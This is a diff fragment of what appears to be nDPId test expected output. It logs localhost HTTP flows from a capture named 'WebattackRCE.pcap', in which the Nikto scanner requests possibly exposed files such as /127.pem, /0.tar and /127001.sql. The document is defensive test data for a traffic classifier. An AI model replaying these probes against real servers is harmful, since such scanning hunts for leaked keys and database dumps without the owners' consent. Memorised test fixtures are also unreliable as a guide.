{"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276904,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":1576420276904,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276904,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/WUtAAEAG4ut\/AAABfwAAAcK2H5D8ZmEEi9guOYAYAED+swAAAQEICp1m+9CdZvvQR0VUIC8xMjcucGVtIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276904,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":151,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276904,"flow_last_seen":1576420276904,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276904,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49846,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":1576420276905,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276905,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/HslAAEAGHW5\/AAABfwAAAcK4H5CgfyaOuiPkq4AYAED+swAAAQEICp1m+9GdZvvRR0VUIC8xMjcucGVtIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276905,"flow_last_seen":1576420276905,"flow_idle_time":7580000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276905,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49848,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":1576420276907,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276907,"pkt":"AAAAAAAAAAAAAAAACABFAAC9zZ5AAEAGbpp\/AAABfwAAAcK6H5CXJ\/XXeafd0YAYAED+sQAAAQEICp1m+9OdZvvSR0VUIC8wLnRhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276907,"flow_last_seen":1576420276907,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276907,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49850,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_packet_id":1,"flow_last_seen":1576420276908,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276908,"pkt":"AAAAAAAAAAAAAAAACABFAAC9umJAAEAGgdZ\/AAABfwAAAcK8H5Cw+YIsSeaYa4AYAED+sQAAAQEICp1m+9SdZvvUR0VUIC8wLnRhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":154,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276908,"flow_last_seen":1576420276908,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276908,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49852,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_packet_id":1,"flow_last_seen":1576420276910,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276910,"pkt":"AAAAAAAAAAAAAAAACABFAADDPvVAAEAG\/T1\/AAABfwAAAcK+H5Bg7Aa5zb6cN4AYAED+twAAAQEICp1m+9adZvvWR0VUIC8xMjcuMC4wLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":155,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276910,"flow_last_seen":1576420276910,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276910,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49854,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_packet_id":1,"flow_last_seen":1576420276912,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276912,"pkt":"AAAAAAAAAAAAAAAACABFAADDm5RAAEAGoJ5\/AAABfwAAAcLAH5Ba3KPftqtSlIAYAED+twAAAQEICp1m+9edZvvXR0VUIC8xMjcuMC4wLnBlbSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":156,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276912,"flow_last_seen":1576420276912,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276912,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49856,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_packet_id":1,"flow_last_seen":1576420276913,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276913,"pkt":"AAAAAAAAAAAAAAAACABFAADCN0tAAEAGBOl\/AAABfwAAAcLCH5DYOQ8GBjLTAIAYAED+tgAAAQEICp1m+9mdZvvZR0VUIC8xMjcwMDEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276913,"flow_last_seen":1576420276913,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276913,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49858,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276916,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_packet_id":1,"flow_last_seen":1576420276916,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276916,"pkt":"AAAAAAAAAAAAAAAACABFAADCczVAAEAGyP5\/AAABfwAAAcLEH5BP20t\/\/3FheoAYAED+tgAAAQEICp1m+9ydZvvcR0VUIC8xMjcwMDEuc3FsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":158,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":158,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276916,"flow_last_seen":1576420276916,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276916,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49860,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.sql","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
